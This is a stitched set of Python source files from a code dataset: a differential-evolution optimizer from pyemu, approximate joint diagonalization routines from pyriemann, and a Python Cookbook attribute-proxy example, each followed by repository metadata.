            # big assumption the run results are in the same order
            df.index = dv_ensemble.index
            oe = pyemu.ObservationEnsemble.from_dataframe(df=df, pst=self.pst)
        self._archive(dv_ensemble, oe)
        return oe

    def update(self, *args, **kwargs):
        # abstract: concrete algorithms (e.g. EliteDiffEvol) implement this
        self.logger.lraise("EvolAlg.update() must be implemented by derived types")
class EliteDiffEvol(EvolAlg):
    """Elitist multiobjective differential-evolution algorithm built on EvolAlg."""

    def __init__(
        self,
        pst,
        parcov=None,
        obscov=None,
        num_workers=0,
        use_approx_prior=True,
        submit_file=None,
        verbose=False,
        port=4004,
        worker_dir="template",
    ):
        super(EliteDiffEvol, self).__init__(
            pst=pst,
            parcov=parcov,
            obscov=obscov,
            num_workers=num_workers,
            submit_file=submit_file,
            verbose=verbose,
            port=port,
            worker_dir=worker_dir,
        )

    def update(self, mut_base=0.8, cross_over_base=0.7, num_dv_reals=None):
        """Run one generation: spawn offspring with DE mutation/crossover,
        evaluate them, apply elitist parent-vs-child replacement, then trim
        the population back to num_dv_reals by crowding distance."""
        if not self._initialized:
            self.logger.lraise("not initialized")
        if num_dv_reals is None:
            num_dv_reals = self.num_dv_reals
        # DE mutation needs a parent plus three distinct donors
        if self.dv_ensemble.shape[0] < 4:
            self.logger.lraise("not enough individuals in population to continue")

        # function to get unique index names
        self._child_count = 0

        def next_name():
            while True:
                sol_name = "c_i{0}_{1}".format(self.iter_num, self._child_count)
                if sol_name not in self.dv_ensemble.index.values:
                    break
                self._child_count += 1
            return sol_name

        # generate self.num_dv_reals offspring using diff evol rules
        dv_offspring = []
        child2parent = {}
        offspring_idx = []
        tol = 1.0
        num_dv = self.dv_ensemble.shape[1]
        dv_names = self.dv_ensemble.columns
        # work in log10 space for log-transformed decision variables,
        # with bounds transformed to match
        dv_log = self.pst.parameter_data.loc[dv_names, "partrans"] == "log"
        lb = self.pst.parameter_data.loc[dv_names, "parlbnd"].copy()
        ub = self.pst.parameter_data.loc[dv_names, "parubnd"].copy()
        lb.loc[dv_log] = lb.loc[dv_log].apply(np.log10)
        ub.loc[dv_log] = ub.loc[dv_log].apply(np.log10)
        dv_ensemble_trans = self.dv_ensemble.copy()
        for idx in dv_ensemble_trans.index:
            dv_ensemble_trans.loc[idx, dv_log] = dv_ensemble_trans.loc[
                idx, dv_log
            ].apply(lambda x: np.log10(x))
        for i in range(num_dv_reals):
            # every parent gets an offspring
            if i < self.dv_ensemble.shape[0]:
                parent_idx = i
                mut = mut_base
                cross_over = cross_over_base
            else:
                # otherwise, some parents get more than one offspring
                # could do something better here - like pick a good parent
                # make a wild child
                parent_idx = np.random.randint(0, dv_ensemble_trans.shape[0])
                mut = 0.9
                cross_over = 0.9
            parent = dv_ensemble_trans.iloc[parent_idx, :]
            # select the three other members in the population
            abc_idxs = np.random.choice(dv_ensemble_trans.index, 3, replace=False)
            abc = dv_ensemble_trans.loc[abc_idxs, :].copy()
            # classic DE/rand/1 mutant: a + F * (b - c)
            mutant = abc.iloc[0] + (mut * (abc.iloc[1] - abc.iloc[2]))
            # select cross over genes (dec var values)
            cross_points = np.random.rand(num_dv) < cross_over
            if not np.any(cross_points):
                cross_points[np.random.randint(0, num_dv)] = True
            # create an offspring
            offspring = parent._df.copy()
            offspring.loc[cross_points] = mutant.loc[cross_points]
            # enforce bounds
            out = offspring > ub
            offspring.loc[out] = ub.loc[out]
            out = offspring < lb
            offspring.loc[out] = lb.loc[out]
            # back transform
            offspring.loc[dv_log] = 10.0 ** offspring.loc[dv_log]
            offspring = offspring.loc[self.dv_ensemble.columns]
            sol_name = "c_{0}".format(i)
            dv_offspring.append(offspring)
            offspring_idx.append(sol_name)
            child2parent[sol_name] = dv_ensemble_trans.index[parent_idx]
        dv_offspring = pd.DataFrame(
            dv_offspring, columns=self.dv_ensemble.columns, index=offspring_idx
        )

        # run the model with offspring candidates
        self.logger.log(
            "running {0} canditiate solutions for iteration {1}".format(
                dv_offspring.shape[0], self.iter_num
            )
        )
        obs_offspring = self._calc_obs(dv_offspring)

        # evaluate offspring fitness WRT feasibility and nondomination (elitist) -
        # if offspring dominates parent, replace in
        # self.dv_ensemble and self.obs_ensemble.  if not, drop candidate.
        # If tied, keep both
        isfeas = self.obj_func.is_feasible(obs_offspring)
        isnondom = self.obj_func.is_nondominated(obs_offspring)
        for child_idx in obs_offspring.index:
            if not isfeas[child_idx]:
                self.logger.statement("child {0} is not feasible".format(child_idx))
                continue
            child_sol = obs_offspring.loc[child_idx, :]
            parent_idx = child2parent[child_idx]
            if parent_idx is None:
                # the parent was already removed by another child, so if this child is
                # feasible and nondominated, keep it
                # NOTE(review): isnondom is a pandas Series; calling it raises
                # TypeError -- isnondom[child_idx] appears intended.
                if isnondom(child_idx):
                    self.logger.statement(
                        "orphaned child {0} retained".format(child_idx)
                    )
                    sol_name = next_name()
                    # NOTE(review): child_sol holds *observation* values;
                    # assigning it into dv_ensemble looks wrong --
                    # dv_offspring.loc[child_idx, :] seems intended; confirm.
                    self.dv_ensemble.loc[sol_name, child_sol.index] = child_sol
                    self.obs_ensemble.loc[
                        sol_name, obs_offspring.columns
                    ] = obs_offspring.loc[child_idx, :]
            else:
                parent_sol = self.obs_ensemble.loc[parent_idx, :]
                if self.obj_func.dominates(
                    parent_sol.loc[self.obj_func.obs_obj_names],
                    child_sol.loc[self.obj_func.obs_obj_names],
                ):
                    self.logger.statement(
                        "child {0} dominated by parent {1}".format(
                            child_idx, parent_idx
                        )
                    )
                    # your dead to me!
                    pass
                elif self.obj_func.dominates(
                    child_sol.loc[self.obj_func.obs_obj_names],
                    parent_sol.loc[self.obj_func.obs_obj_names],
                ):
                    # hey dad, what do you think about your son now!
                    self.logger.statement(
                        "child {0} dominates parent {1}".format(child_idx, parent_idx)
                    )
                    # child replaces the parent in-place
                    self.dv_ensemble.loc[
                        parent_idx, dv_offspring.columns
                    ] = dv_offspring.loc[child_idx, :]
                    self.obs_ensemble._df.loc[
                        parent_idx, obs_offspring.columns
                    ] = obs_offspring._df.loc[child_idx, :]
                    # NOTE(review): ``idx`` is the stale loop variable from the
                    # transform loop above; ``child_idx`` appears intended as
                    # the key here -- confirm.
                    child2parent[idx] = None
                else:
                    # mutual nondominance: keep both parent and child
                    self.logger.statement(
                        "child {0} and parent {1} kept".format(child_idx, parent_idx)
                    )
                    sol_name = next_name()
                    self.dv_ensemble.loc[
                        sol_name, dv_offspring.columns
                    ] = dv_offspring.loc[child_idx, :]
                    self.obs_ensemble._df.loc[
                        sol_name, obs_offspring.columns
                    ] = obs_offspring._df.loc[child_idx, :]

        # if there are too many individuals in self.dv_ensemble,
        # first drop dominated,then reduce by using crowding distance.
        # self.logger.statement("number of solutions:{0}".format(self.dv_ensemble.shape[0]))
        isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
        dom_idx = isnondom.loc[isnondom == False].index
        nondom_idx = isnondom.loc[isnondom == True].index
        self.logger.statement(
            "number of dominated solutions:{0}".format(dom_idx.shape[0])
        )
        # self.logger.statement("nondominated solutions: {0}".format(','.join(nondom_idx)))
        self.logger.statement("dominated solutions: {0}".format(",".join(str(dom_idx))))
        ndrop = self.dv_ensemble.shape[0] - num_dv_reals
        if ndrop > 0:
            isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
            vc = isnondom.value_counts()
            # if there a dominated solutions, drop those first, using
            # crowding distance as the order
            if False in vc.index:
                # get dfs for the dominated solutions
                dv_dom = self.dv_ensemble.loc[dom_idx, :].copy()
                obs_dom = self.obs_ensemble.loc[dom_idx, :].copy()
                self.dv_ensemble.drop(dom_idx, inplace=True)
                self.obs_ensemble.drop(dom_idx, inplace=True)
                self.logger.statement(
                    "dropping {0} dominated individuals based on crowd distance".format(
                        min(ndrop, dv_dom.shape[0])
                    )
                )
                self._drop_by_crowd(dv_dom, obs_dom, min(ndrop, dv_dom.shape[0]))
                # add any remaining dominated solutions back
                self.dv_ensemble = self.dv_ensemble.append(dv_dom._df)
                self.obs_ensemble = self.obs_ensemble.append(obs_dom._df)
            # drop remaining nondom solutions as needed
            if self.dv_ensemble.shape[0] > num_dv_reals:
                self._drop_by_crowd(
                    self.dv_ensemble,
                    self.obs_ensemble,
                    self.dv_ensemble.shape[0] - num_dv_reals,
                )
        self.iter_report()
        self.iter_num += 1
        return

    def iter_report(self):
        """Write per-iteration dv/obs CSVs (tagged with feasibility,
        nondomination, crowd distance) and log summary counts."""
        oe = self.obs_ensemble.copy()
        dv = self.dv_ensemble.copy()
        isfeas = self.obj_func.is_feasible(oe)
        isnondom = self.obj_func.is_nondominated(oe)
        cd = self.obj_func.crowd_distance(oe)
        for df in [oe, dv]:
            df.loc[isfeas.index, "feasible"] = isfeas
            df.loc[isnondom.index, "nondominated"] = isnondom
            df.loc[cd.index, "crowd_distance"] = cd
        dv.to_csv("dv_ensemble.{0}.csv".format(self.iter_num + 1))
        oe.to_csv("obs_ensemble.{0}.csv".format(self.iter_num + 1))
        self.logger.statement("*** iteration {0} report".format(self.iter_num + 1))
        self.logger.statement("{0} current solutions".format(dv.shape[0]))
        self.logger.statement("{0} infeasible".format(isfeas[isfeas == False].shape[0]))
        self.logger.statement(
            "{0} nondomiated".format(isnondom[isnondom == True].shape[0])
        )

    def _drop_by_crowd(self, dv_ensemble, obs_ensemble, ndrop, min_dist=0.1):
        """Remove (in place) the ndrop members with the smallest crowding
        distance, recomputing the distance after each removal."""
        if ndrop > dv_ensemble.shape[0]:
            self.logger.lraise(
                "EliteDiffEvol.drop_by_crowd() error: ndrop"
                + "{0} > dv_ensemble.shape[0] {1}".format(ndrop, dv_ensemble.shape[0])
            )
        self.logger.statement(
            "dropping {0} of {1} individuals based on crowd distance".format(
                ndrop, dv_ensemble.shape[0]
            )
        )
        # if min_dist is not None:
        #     while True:
        #         cd = self.obj_func.crowd_distance(obs_ensemble)
        #         if cd.min() >= min_dist or ndrop == 0:
        #             break
        #         cd.sort_values(inplace=True, ascending=False)
        #
        #         drop_idx = cd.index[-1]
        #         self.logger.statement("dropping solution {0} - less then 'min_dist' apart{1}".\
        #                               format(drop_idx,cd.loc[drop_idx]))
        #
        #         dv_ensemble.drop(drop_idx,inplace=True)
        #         obs_ensemble.drop(drop_idx,inplace=True)
        #         ndrop -= 1%
        for idrop in range(ndrop):
            cd = self.obj_func.crowd_distance(obs_ensemble)
            # descending sort puts the most-crowded-out (smallest distance)
            # member last
            cd.sort_values(inplace=True, ascending=False)
            # drop the first element in cd from both dv_ensemble and obs_ensemble
            drop_idx = cd.index[-1]
            self.logger.statement(
                "solution {0} removed based on crowding distance {1}".format(
                    drop_idx, cd[drop_idx]
                )
            )
            dv_ensemble.drop(drop_idx, inplace=True)
            obs_ensemble.drop(drop_idx, inplace=True)
| {
"repo_name": "jtwhite79/pyemu",
"path": "pyemu/prototypes/moouu.py",
"copies": "1",
"size": "36825",
"license": "bsd-3-clause",
"hash": 6117156897981551000,
"line_mean": 37.2796257796,
"line_max": 112,
"alpha_frac": 0.5164154786,
"autogenerated": false,
"ratio": 3.8347391440174947,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9847776625845043,
"avg_score": 0.0006755993544905156,
"num_lines": 962
} |
"""Aproximate joint diagonalization algorithm."""
import numpy as np
def rjd(X, eps=1e-8, n_iter_max=1000):
    """Approximate joint diagonalization based on Jacobi angles.
    This is a direct implementation of the Cardoso AJD algorithm [1] used in
    JADE. The code is a translation of the matlab code provided in the author
    website.
    Parameters
    ----------
    X : ndarray, shape (n_trials, n_channels, n_channels)
        A set of covariance matrices to diagonalize
    eps : float (default 1e-8)
        Tolerance for stopping criterion.
    n_iter_max : int (default 1000)
        The maximum number of iteration to reach convergence.
    Returns
    -------
    V : ndarray, shape (n_channels, n_channels)
        the diagonalizer
    D : ndarray, shape (n_trials, n_channels, n_channels)
        the set of quasi diagonal matrices
    Notes
    -----
    .. versionadded:: 0.2.4
    See Also
    --------
    ajd_pham
    uwedge
    References
    ----------
    [1] Cardoso, Jean-Francois, and Antoine Souloumiac. Jacobi angles for
    simultaneous diagonalization. SIAM journal on matrix analysis and
    applications 17.1 (1996): 161-164.
    """
    # stack the n_trials (m x m) matrices side by side: A is (m, n_trials*m)
    A = np.concatenate(X, 0).T
    # init variables
    m, nm = A.shape
    V = np.eye(m)
    encore = True
    k = 0
    while encore:
        encore = False
        k += 1
        if k > n_iter_max:
            break
        for p in range(m - 1):
            for q in range(p + 1, m):
                # columns of A holding the (p, .) and (q, .) entries of each matrix
                Ip = np.arange(p, nm, m)
                Iq = np.arange(q, nm, m)
                # computation of Givens angle
                g = np.array([A[p, Ip] - A[q, Iq], A[p, Iq] + A[q, Ip]])
                gg = np.dot(g, g.T)
                ton = gg[0, 0] - gg[1, 1]
                toff = gg[0, 1] + gg[1, 0]
                theta = 0.5 * np.arctan2(toff, ton +
                                         np.sqrt(ton * ton + toff * toff))
                c = np.cos(theta)
                s = np.sin(theta)
                encore = encore | (np.abs(s) > eps)
                if (np.abs(s) > eps):
                    # apply the Givens rotation to the matrices and accumulate
                    # it into the diagonalizer V
                    tmp = A[:, Ip].copy()
                    A[:, Ip] = c * A[:, Ip] + s * A[:, Iq]
                    A[:, Iq] = c * A[:, Iq] - s * tmp
                    tmp = A[p, :].copy()
                    A[p, :] = c * A[p, :] + s * A[q, :]
                    A[q, :] = c * A[q, :] - s * tmp
                    tmp = V[:, p].copy()
                    V[:, p] = c * V[:, p] + s * V[:, q]
                    V[:, q] = c * V[:, q] - s * tmp
    # nm // m == n_trials; the original `nm / m` is a float in Python 3 and
    # makes np.reshape raise a TypeError (shape entries must be integers)
    D = np.reshape(A, (m, nm // m, m)).transpose(1, 0, 2)
    return V, D
def ajd_pham(X, eps=1e-6, n_iter_max=15):
    """Approximate joint diagonalization based on Pham's algorithm.
    This is a direct implementation of the PHAM's AJD algorithm [1].
    Parameters
    ----------
    X : ndarray, shape (n_trials, n_channels, n_channels)
        A set of covariance matrices to diagonalize
    eps : float (default 1e-6)
        Tolerance for stopping criterion.
    n_iter_max : int (default 15)
        The maximum number of iteration to reach convergence.
    Returns
    -------
    V : ndarray, shape (n_channels, n_channels)
        the diagonalizer
    D : ndarray, shape (n_trials, n_channels, n_channels)
        the set of quasi diagonal matrices
    Notes
    -----
    .. versionadded:: 0.2.4
    See Also
    --------
    rjd
    uwedge
    References
    ----------
    [1] Pham, Dinh Tuan. "Joint approximate diagonalization of positive
    definite Hermitian matrices." SIAM Journal on Matrix Analysis and
    Applications 22, no. 4 (2001): 1136-1152.
    """
    nmat = X.shape[0]
    # stack the n_trials (m x m) matrices side by side: A is (m, n_trials*m)
    A = np.concatenate(X, 0).T
    # init variables
    m, nm = A.shape
    V = np.eye(m)
    epsi = m * (m - 1) * eps
    for it in range(n_iter_max):
        decr = 0
        for i in range(1, m):
            for j in range(i):
                # columns of A holding the (i, .) and (j, .) entries
                Ii = np.arange(i, nm, m)
                Ij = np.arange(j, nm, m)
                c1 = A[i, Ii]
                c2 = A[j, Ij]
                g12 = np.mean(A[i, Ij] / c1)
                g21 = np.mean(A[i, Ij] / c2)
                omega21 = np.mean(c1 / c2)
                omega12 = np.mean(c2 / c1)
                omega = np.sqrt(omega12 * omega21)
                tmp = np.sqrt(omega21 / omega12)
                tmp1 = (tmp * g12 + g21) / (omega + 1)
                # lower-bound the denominator at 1e-9 to avoid division by
                # zero when omega ~= 1.  The original `np.max(omega - 1, 1e-9)`
                # passed 1e-9 as the *axis* argument of np.max, which raises a
                # TypeError; the intent is an element-wise max of two scalars.
                tmp2 = (tmp * g12 - g21) / max(omega - 1, 1e-9)
                h12 = tmp1 + tmp2
                h21 = np.conj((tmp1 - tmp2) / tmp)
                decr = decr + nmat * (g12 * np.conj(h12) + g21 * h21) / 2.0
                tmp = 1 + 1.j * 0.5 * np.imag(h12 * h21)
                tmp = np.real(tmp + np.sqrt(tmp ** 2 - h12 * h21))
                # elementary transform applied to rows/columns (i, j) and
                # accumulated into the diagonalizer V
                T = np.array([[1, -h12 / tmp], [-h21 / tmp, 1]])
                A[[i, j], :] = np.dot(T, A[[i, j], :])
                tmp = np.c_[A[:, Ii], A[:, Ij]]
                tmp = np.dot(np.reshape(tmp, (m * nmat, 2), order='F'), T.T)
                tmp = np.reshape(tmp, (m, nmat * 2), order='F')
                A[:, Ii] = tmp[:, :nmat]
                A[:, Ij] = tmp[:, nmat:]
                V[[i, j], :] = np.dot(T, V[[i, j], :])
        if decr < epsi:
            break
    # nm // m == n_trials; `nm / m` is a float in Python 3 and np.reshape
    # would raise a TypeError
    D = np.reshape(A, (m, nm // m, m)).transpose(1, 0, 2)
    return V, D
import scipy as sp
def uwedge(X, init=None, eps=1e-7, n_iter_max=100):
    """Approximate joint diagonalization algorithm UWEDGE.
    Uniformly Weighted Exhaustive Diagonalization using Gauss iteration
    (U-WEDGE). Implementation of the AJD algorithm by Tichavsky and Yeredor.
    This is a translation from the matlab code provided by the authors.
    Parameters
    ----------
    X : ndarray, shape (n_trials, n_channels, n_channels)
        A set of covariance matrices to diagonalize
    init: None | ndarray, shape (n_channels, n_channels) (default None)
        Initialization for the diagonalizer.
    eps : float (default 1e-7)
        Tolerance for stopping criterion.
    n_iter_max : int (default 100)
        The maximum number of iteration to reach convergence.
    Returns
    -------
    V : ndarray, shape (n_channels, n_channels)
        the diagonalizer
    D : ndarray, shape (n_trials, n_channels, n_channels)
        the set of quasi diagonal matrices
    Notes
    -----
    .. versionadded:: 0.2.4
    See Also
    --------
    rjd
    ajd_pham
    References
    ----------
    [1] P. Tichavsky, A. Yeredor and J. Nielsen,
    "A Fast Approximate Joint Diagonalization Algorithm
    Using a Criterion with a Block Diagonal Weight Matrix",
    ICASSP 2008, Las Vegas
    [2] P. Tichavsky and A. Yeredor, "Fast Approximate Joint Diagonalization
    Incorporating Weight Matrices" IEEE Transactions of Signal Processing,
    2009.
    """
    L, d, _ = X.shape
    # lay the trial matrices side by side: M is (d, L*d)
    M = np.concatenate(X, 0).T
    d, Md = M.shape
    iteration = 0
    improve = 10

    # initial demixing matrix: whiten against the first matrix unless the
    # caller supplies one
    if init is None:
        E, H = sp.linalg.eig(M[:, 0:d])
        W_est = np.dot(np.diag(1. / np.sqrt(np.abs(E))), H.T)
    else:
        W_est = init

    Ms = np.array(M)
    Rs = np.zeros((d, L))
    for k in range(L):
        Il = np.arange(k * d, (k + 1) * d)
        # enforce symmetry before transforming
        M[:, Il] = 0.5 * (M[:, Il] + M[:, Il].T)
        Ms[:, Il] = np.dot(np.dot(W_est, M[:, Il]), W_est.T)
        Rs[:, k] = np.diag(Ms[:, Il])

    # criterion: total off-diagonal energy of the transformed matrices
    crit = np.sum(Ms ** 2) - np.sum(Rs ** 2)
    while improve > eps and iteration < n_iter_max:
        # Gauss-iteration update of the demixing matrix
        B = np.dot(Rs, Rs.T)
        C1 = np.zeros((d, d))
        for col in range(d):
            C1[:, col] = np.sum(Ms[:, col:Md:d] * Rs, axis=1)
        D0 = B * B.T - np.outer(np.diag(B), np.diag(B))
        # np.eye(d) in the denominator avoids dividing by D0's zero diagonal
        A0 = np.eye(d) + (C1 * B - np.dot(np.diag(np.diag(B)), C1.T)) / (D0 + np.eye(d))
        W_est = sp.linalg.solve(A0, W_est)

        # rescale rows so the first transformed matrix has a unit diagonal
        Raux = np.dot(np.dot(W_est, M[:, 0:d]), W_est.T)
        aux = 1. / np.sqrt(np.abs(np.diag(Raux)))
        W_est = np.dot(np.diag(aux), W_est)

        # refresh the transformed matrices and their diagonals
        for k in range(L):
            Il = np.arange(k * d, (k + 1) * d)
            Ms[:, Il] = np.dot(np.dot(W_est, M[:, Il]), W_est.T)
            Rs[:, k] = np.diag(Ms[:, Il])

        new_crit = np.sum(Ms ** 2) - np.sum(Rs ** 2)
        improve = np.abs(new_crit - crit)
        crit = new_crit
        iteration += 1

    D = np.reshape(Ms, (d, L, d)).transpose(1, 0, 2)
    return W_est, D
| {
"repo_name": "alexandrebarachant/decoding-brain-challenge-2016",
"path": "models/pyriemann/utils/ajd.py",
"copies": "1",
"size": "8379",
"license": "bsd-3-clause",
"hash": -7548331173395832000,
"line_mean": 28.5035211268,
"line_max": 78,
"alpha_frac": 0.4985081752,
"autogenerated": false,
"ratio": 3.128827483196415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4127335658396415,
"avg_score": null,
"num_lines": null
} |
# A proxy class that wraps around another object, but
# exposes its public attributes
class Proxy:
    """Transparent wrapper that forwards public attribute access to an
    internal object while keeping underscore-prefixed attributes local."""

    def __init__(self, obj):
        self._obj = obj

    def __getattr__(self, name):
        # Only called when normal lookup fails, so private attributes set on
        # the proxy itself never reach this point.
        print('getattr:', name)
        return getattr(self._obj, name)

    def __setattr__(self, name, value):
        # Private names live on the proxy; everything else goes to the target.
        if not name.startswith('_'):
            print('setattr:', name, value)
            setattr(self._obj, name, value)
        else:
            super().__setattr__(name, value)

    def __delattr__(self, name):
        # Same split as __setattr__: private on the proxy, public delegated.
        if not name.startswith('_'):
            print('delattr:', name)
            delattr(self._obj, name)
        else:
            super().__delattr__(name)
if __name__ == '__main__':
    # Demonstration: wrap a Spam instance and exercise the delegation paths.
    class Spam:
        def __init__(self, x):
            self.x = x

        def bar(self, y):
            print('Spam.bar:', self.x, y)

    target = Spam(2)          # the wrapped instance
    wrapper = Proxy(target)   # proxy around it
    print(wrapper.x)          # Outputs 2
    wrapper.bar(3)            # Outputs "Spam.bar: 2 3"
    wrapper.x = 37            # Changes target.x to 37
| {
"repo_name": "tuanavu/python-cookbook-3rd",
"path": "src/8/delegation_and_proxies/example2.py",
"copies": "2",
"size": "1185",
"license": "mit",
"hash": -3156999075640508400,
"line_mean": 25.3333333333,
"line_max": 53,
"alpha_frac": 0.5282700422,
"autogenerated": false,
"ratio": 3.898026315789474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0016777461221905666,
"num_lines": 45
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.